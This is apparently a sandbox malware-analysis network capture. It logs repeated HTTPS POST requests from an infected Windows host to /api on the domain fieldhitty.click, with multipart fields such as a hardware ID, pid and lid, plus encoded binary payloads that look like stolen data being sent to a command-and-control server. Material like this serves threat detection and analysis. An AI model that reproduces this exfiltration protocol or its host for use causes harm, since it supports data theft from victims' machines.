                                                                                                                                                                                                                                                              Data Ascii: SELT+lqpfi/86ofc2xETOmLhlu+YPZjlDr+d6Z0Ok3rdEEGrjis7vam7DB4S1lc/ZbBQ/Z0vmmdeaczr2kwSelxREnkdq3wu/ujHWZqR0rkj4pOuGD6YpUx9HnsKHlB+TkTBtV1pPa16OwIOnsJQOPA2Ry0Y/5hnTX0e61qN0HkcENO8nmv/rfwoxZwZ0xD6ISHU/gjvmmJeaczg0EMBMBDC1muYevxur70V3hhRU/ghohQsmT1Ypo983qpYDhD
                                                                                                                                                                                                                                                              2024-12-22 01:23:04 UTC1369INData Raw: 48 70 61 71 58 37 75 66 61 6b 48 6e 56 6d 54 45 72 70 6a 49 74 64 76 32 50 77 5a 74 46 33 76 33 53 30 4a 6d 45 47 77 47 6c 51 56 50 5a 31 69 76 75 35 76 72 4e 5a 62 53 4a 4f 53 36 2f 59 77 56 57 71 61 66 4e 38 6d 44 37 78 66 4b 39 30 4f 45 76 71 61 30 78 4a 35 48 2b 6e 38 4c 6e 34 72 52 4a 2b 62 6b 35 43 35 49 2b 4e 48 50 59 74 2b 58 62 52 59 62 39 64 70 33 55 75 52 65 39 79 58 56 32 67 5a 2b 58 76 39 76 6d 67 56 79 77 69 53 6b 7a 6b 68 49 46 51 75 47 6e 7a 62 6f 4d 32 2b 48 53 6c 62 53 74 4d 35 6e 35 41 54 75 74 33 72 65 53 36 38 4c 34 53 5a 6e 41 4a 43 61 2b 48 6d 52 7a 67 4c 63 68 70 67 53 6e 38 4d 5a 31 77 4f 6c 44 71 64 45 63 47 2f 7a 61 79 74 72 48 79 37 45 38 30 5a 45 5a 4f 37 49 2b 41 56 62 52 67 2b 32 65 55 4f 50 6c 33 70 6d 77 35 51 4f 64 34 54
                                                                                                                                                                                                                                                              Data Ascii: HpaqX7ufakHnVmTErpjItdv2PwZtF3v3S0JmEGwGlQVPZ1ivu5vrNZbSJOS6/YwVWqafN8mD7xfK90OEvqa0xJ5H+n8Ln4rRJ+bk5C5I+NHPYt+XbRYb9dp3UuRe9yXV2gZ+Xv9vmgVywiSkzkhIFQuGnzboM2+HSlbStM5n5ATut3reS68L4SZnAJCa+HmRzgLchpgSn8MZ1wOlDqdEcG/zaytrHy7E80ZEZO7I+AVbRg+2eUOPl3pmw5QOd4T
                                                                                                                                                                                                                                                              2024-12-22 01:23:04 UTC1369INData Raw: 73 2b 76 61 6d 37 42 52 7a 59 55 68 4e 35 6f 79 4f 57 37 78 2f 39 47 6d 44 4f 50 35 34 6f 57 6f 35 53 2b 78 7a 53 6b 2f 74 64 4b 62 78 73 66 47 70 56 7a 6f 69 54 6c 2b 76 32 4d 46 39 74 57 62 79 4e 63 74 35 34 44 32 31 4a 6a 35 4b 6f 53 45 4c 52 75 70 39 6f 66 75 31 38 61 38 46 64 57 52 62 52 2b 4b 4b 6b 31 61 7a 61 50 4e 6a 6e 44 72 35 64 61 64 71 4b 30 2f 68 65 6b 41 47 72 6a 69 73 37 76 61 6d 37 44 52 6a 64 45 4e 41 34 35 61 4b 58 62 74 37 38 33 37 52 64 37 39 69 71 33 64 35 48 76 64 70 58 45 48 2f 4e 72 4b 32 73 66 4c 73 54 7a 52 6b 51 45 48 6f 68 6f 39 4f 76 57 76 78 59 5a 67 77 2b 33 75 76 5a 6a 31 43 35 6e 78 49 53 75 74 2f 71 50 6d 79 39 36 49 65 65 79 49 48 42 2b 69 59 77 51 54 34 54 4f 56 74 6e 54 53 2f 62 4f 4a 2f 65 55 48 74 4f 52 4d 47 37 48
                                                                                                                                                                                                                                                              Data Ascii: s+vam7BRzYUhN5oyOW7x/9GmDOP54oWo5S+xzSk/tdKbxsfGpVzoiTl+v2MF9tWbyNct54D21Jj5KoSELRup9ofu18a8FdWRbR+KKk1azaPNjnDr5dadqK0/hekAGrjis7vam7DRjdENA45aKXbt7837Rd79iq3d5HvdpXEH/NrK2sfLsTzRkQEHoho9OvWvxYZgw+3uvZj1C5nxISut/qPmy96IeeyIHB+iYwQT4TOVtnTS/bOJ/eUHtORMG7H
                                                                                                                                                                                                                                                              2024-12-22 01:23:04 UTC265INData Raw: 36 4b 6b 51 59 69 42 38 52 4f 47 4f 68 6b 72 34 63 73 45 67 30 54 62 6c 4d 2f 52 66 49 41 62 6d 64 51 73 65 6f 47 32 73 39 72 48 6b 75 68 42 34 63 30 4a 4b 34 36 4b 4f 57 36 35 75 38 57 32 41 4d 4c 4e 34 6f 53 5a 33 42 75 5a 68 43 78 36 67 56 36 7a 67 74 64 47 76 42 6e 30 69 42 77 66 6f 6c 73 45 45 2b 46 4f 2b 66 4a 49 70 2f 48 79 39 57 48 6b 65 2b 45 63 4c 54 66 5a 2f 75 2f 57 67 39 61 45 62 5a 56 77 4a 48 37 76 53 30 77 37 71 50 2b 45 75 6a 67 61 78 4d 36 30 6d 59 58 2f 34 4f 56 30 47 75 43 72 6c 74 71 53 2b 39 46 63 7a 59 56 74 56 36 59 4f 58 58 2f 39 54 77 45 6d 48 4d 2f 68 6a 71 33 45 32 42 71 38 35 52 41 61 34 51 65 76 2f 73 65 57 39 41 58 6c 79 54 67 66 51 7a 73 46 45 2b 44 57 2b 57 35 49 33 38 58 53 36 64 33 52 68 39 33 4e 4d 56 75 64 76 70 4c 62
                                                                                                                                                                                                                                                              Data Ascii: 6KkQYiB8ROGOhkr4csEg0TblM/RfIAbmdQseoG2s9rHkuhB4c0JK46KOW65u8W2AMLN4oSZ3BuZhCx6gV6zgtdGvBn0iBwfolsEE+FO+fJIp/Hy9WHke+EcLTfZ/u/Wg9aEbZVwJH7vS0w7qP+EujgaxM60mYX/4OV0GuCrltqS+9FczYVtV6YOXX/9TwEmHM/hjq3E2Bq85RAa4Qev/seW9AXlyTgfQzsFE+DW+W5I38XS6d3Rh93NMVudvpLb
                                                                                                                                                                                                                                                              2024-12-22 01:23:04 UTC1369INData Raw: 32 63 36 35 0d 0a 48 42 2b 75 52 77 51 54 6f 50 36 55 37 77 6d 36 76 49 62 4d 6f 49 41 62 33 4f 52 4d 55 72 6a 69 35 74 75 36 2b 36 78 52 6d 63 45 39 45 2b 59 50 47 59 6f 5a 4b 35 47 4f 58 4c 75 35 4e 6b 6d 45 6a 53 2b 64 75 57 67 72 31 65 36 58 34 73 65 6a 73 57 54 52 74 43 52 2f 57 77 4d 6b 63 68 79 4f 2b 64 74 46 68 76 30 61 76 61 44 64 42 39 32 67 47 59 66 70 31 72 65 47 6e 76 75 4a 58 63 69 49 52 46 36 48 41 68 55 33 34 4e 61 34 38 79 6d 79 73 4a 50 77 30 4a 67 6a 34 4f 56 30 47 75 43 72 6c 74 71 53 2b 39 46 63 7a 59 56 74 56 36 59 4f 58 58 2f 39 54 77 45 43 57 50 2f 70 30 76 43 51 58 54 66 56 2b 43 77 69 67 64 2b 75 75 6a 37 37 6b 56 30 73 73 43 56 2b 76 32 4d 46 70 75 32 50 77 61 59 63 6f 73 6c 32 72 59 44 78 42 38 54 74 6c 54 66 52 2f 36 37 6a 32
                                                                                                                                                                                                                                                              Data Ascii: 2c65HB+uRwQToP6U7wm6vIbMoIAb3ORMUrji5tu6+6xRmcE9E+YPGYoZK5GOXLu5NkmEjS+duWgr1e6X4sejsWTRtCR/WwMkchyO+dtFhv0avaDdB92gGYfp1reGnvuJXciIRF6HAhU34Na48ymysJPw0Jgj4OV0GuCrltqS+9FczYVtV6YOXX/9TwECWP/p0vCQXTfV+Cwigd+uuj77kV0ssCV+v2MFpu2PwaYcosl2rYDxB8TtlTfR/67j2
                                                                                                                                                                                                                                                              2024-12-22 01:23:04 UTC1369INData Raw: 51 6c 53 6c 58 39 68 6f 4a 4b 75 79 72 41 55 4c 59 33 2b 48 4b 36 64 69 35 4a 72 6c 64 39 5a 39 35 47 76 76 57 34 38 4b 73 42 5a 53 49 48 42 2b 44 41 32 57 58 34 4a 62 35 52 33 33 6e 6e 4d 2f 51 6d 44 45 58 76 64 30 78 51 38 54 57 4d 2b 4c 48 2f 75 67 64 6a 62 51 5a 70 32 61 48 42 45 76 68 72 76 6a 62 44 64 37 39 33 76 53 5a 68 46 72 4d 69 48 68 57 33 4b 50 6e 70 2b 4f 66 73 41 54 51 36 47 77 6d 76 6b 73 45 45 2b 43 72 39 66 49 4d 2f 2f 47 57 76 49 51 64 34 78 6e 64 4d 52 2f 5a 6f 70 76 71 58 2f 62 30 64 53 6c 78 63 52 4f 47 4f 68 6b 71 70 4c 62 41 75 6e 6e 6d 6e 53 75 77 75 65 58 6d 76 4f 56 4d 47 75 44 69 65 39 62 6a 77 71 77 46 6c 4c 32 35 4a 36 49 47 58 54 4c 56 68 33 32 32 41 4d 37 38 39 37 47 42 35 48 72 4d 33 43 30 4c 78 4f 50 4f 6d 35 4b 58 35 52
                                                                                                                                                                                                                                                              Data Ascii: QlSlX9hoJKuyrAULY3+HK6di5Jrld9Z95GvvW48KsBZSIHB+DA2WX4Jb5R33nnM/QmDEXvd0xQ8TWM+LH/ugdjbQZp2aHBEvhrvjbDd793vSZhFrMiHhW3KPnp+OfsATQ6GwmvksEE+Cr9fIM//GWvIQd4xndMR/ZopvqX/b0dSlxcROGOhkqpLbAunnmnSuwueXmvOVMGuDie9bjwqwFlL25J6IGXTLVh322AM7897GB5HrM3C0LxOPOm5KX5R


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              91192.168.2.450618104.21.89.115443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:23:05 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=EVLG9F4FKD
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 18110
                                                                                                                                                                                                                                                              Host: fieldhitty.click
                                                                                                                                                                                                                                                              2024-12-22 01:23:05 UTC15331OUTData Raw: 2d 2d 45 56 4c 47 39 46 34 46 4b 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 45 56 4c 47 39 46 34 46 4b 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 56 4c 47 39 46 34 46 4b 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 76 62 41 72 5a 2d 2d 0d 0a 2d 2d 45 56 4c 47 39 46 34 46 4b 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                                                                                                                              Data Ascii: --EVLG9F4FKDContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--EVLG9F4FKDContent-Disposition: form-data; name="pid"2--EVLG9F4FKDContent-Disposition: form-data; name="lid"PvbArZ----EVLG9F4FKDContent-Dispo
                                                                                                                                                                                                                                                              2024-12-22 01:23:05 UTC2779OUTData Raw: cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d
                                                                                                                                                                                                                                                              Data Ascii: \f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-
                                                                                                                                                                                                                                                              2024-12-22 01:23:06 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:23:06 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=eddgtk98vcmbhh9j4ejg12opk5; expires=Wed, 16 Apr 2025 19:09:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Id036%2BXjgrKdXDS7K%2BXw01oitqf5wc0l%2BbwG9tm6fxB6O5VsKfG3Xs3a8ZKnoIGcZcHe%2FqwtvGBUczagp07p60w1cYZpjJcWPqM0yHiL7%2FK9DjME3yygReGQdtDC857K1qSu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c4df95a1b0c92-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1598&rtt_var=639&sent=12&recv=22&lost=0&retrans=0&sent_bytes=2838&recv_bytes=19064&delivery_rate=1659090&cwnd=165&unsent_bytes=0&cid=1bba072e07a76442&ts=926&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:23:06 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:23:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              92192.168.2.450622104.21.89.115443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:23:07 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=5IF1BD26EUTU03521
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8773
                                                                                                                                                                                                                                                              Host: fieldhitty.click
                                                                                                                                                                                                                                                              2024-12-22 01:23:07 UTC8773OUTData Raw: 2d 2d 35 49 46 31 42 44 32 36 45 55 54 55 30 33 35 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 49 46 31 42 44 32 36 45 55 54 55 30 33 35 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 49 46 31 42 44 32 36 45 55 54 55 30 33 35 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 76 62 41 72 5a 2d 2d 0d 0a 2d 2d 35 49 46 31
                                                                                                                                                                                                                                                              Data Ascii: --5IF1BD26EUTU03521Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--5IF1BD26EUTU03521Content-Disposition: form-data; name="pid"2--5IF1BD26EUTU03521Content-Disposition: form-data; name="lid"PvbArZ----5IF1
                                                                                                                                                                                                                                                              2024-12-22 01:23:08 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:23:08 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=jmidiklfrsmk82k2jbd88i4sos; expires=Wed, 16 Apr 2025 19:09:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8zhjYzTZg8PEoQHDizMMHWhCEuTQP8%2BUJJeqvkgxo6eNw6QT6wlxe76Ml51cgS8XC%2Fhfa8rcjEeE%2FDWPXdhKane7xICIlxaTrprnup96rW9UFxvuIJZYN9RggSs%2BtsGcXkhp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c4e06ee5543aa-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=13643&min_rtt=1719&rtt_var=7859&sent=8&recv=13&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9711&delivery_rate=1698662&cwnd=241&unsent_bytes=0&cid=501f6ee41566da26&ts=829&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:23:08 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:23:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              93192.168.2.450624104.21.89.115443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:23:10 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=E1S6CM9GU1P1R
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 20402
                                                                                                                                                                                                                                                              Host: fieldhitty.click
                                                                                                                                                                                                                                                              2024-12-22 01:23:10 UTC15331OUTData Raw: 2d 2d 45 31 53 36 43 4d 39 47 55 31 50 31 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 45 31 53 36 43 4d 39 47 55 31 50 31 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 45 31 53 36 43 4d 39 47 55 31 50 31 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 76 62 41 72 5a 2d 2d 0d 0a 2d 2d 45 31 53 36 43 4d 39 47 55 31 50 31 52 0d 0a 43
                                                                                                                                                                                                                                                              Data Ascii: --E1S6CM9GU1P1RContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--E1S6CM9GU1P1RContent-Disposition: form-data; name="pid"3--E1S6CM9GU1P1RContent-Disposition: form-data; name="lid"PvbArZ----E1S6CM9GU1P1RC
                                                                                                                                                                                                                                                              2024-12-22 01:23:10 UTC5071OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                                                                              2024-12-22 01:23:11 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:23:11 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=hqq57alu9gdo8j3srif9r8nhgf; expires=Wed, 16 Apr 2025 19:09:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sxtJLaWq2G24gMYWcYtd4JEwMXHkGJb%2BFAsIV%2B%2BAa7zMDco8m7VWA3YdbrKiWO9TWCacBzre9Kj7ZzHeZMM8yUel6zM0I3JmHc7CE9tCR%2FH%2F9J%2BTUU5Fnnl0yzD9FaSXEdJv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c4e16ba2dc331-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1631&rtt_var=643&sent=15&recv=25&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21359&delivery_rate=1660978&cwnd=79&unsent_bytes=0&cid=6199c56eec8fa8d7&ts=921&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:23:11 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:23:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              94192.168.2.450633104.21.89.115443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:23:12 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=MT8H0EIQCCS2W6FE6
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 1327
                                                                                                                                                                                                                                                              Host: fieldhitty.click
                                                                                                                                                                                                                                                              2024-12-22 01:23:12 UTC1327OUTData Raw: 2d 2d 4d 54 38 48 30 45 49 51 43 43 53 32 57 36 46 45 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4d 54 38 48 30 45 49 51 43 43 53 32 57 36 46 45 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4d 54 38 48 30 45 49 51 43 43 53 32 57 36 46 45 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 76 62 41 72 5a 2d 2d 0d 0a 2d 2d 4d 54 38 48
                                                                                                                                                                                                                                                              Data Ascii: --MT8H0EIQCCS2W6FE6Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--MT8H0EIQCCS2W6FE6Content-Disposition: form-data; name="pid"1--MT8H0EIQCCS2W6FE6Content-Disposition: form-data; name="lid"PvbArZ----MT8H
                                                                                                                                                                                                                                                              2024-12-22 01:23:13 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:23:13 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=30m8vfksrepnn1jon1omcfucis; expires=Wed, 16 Apr 2025 19:09:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
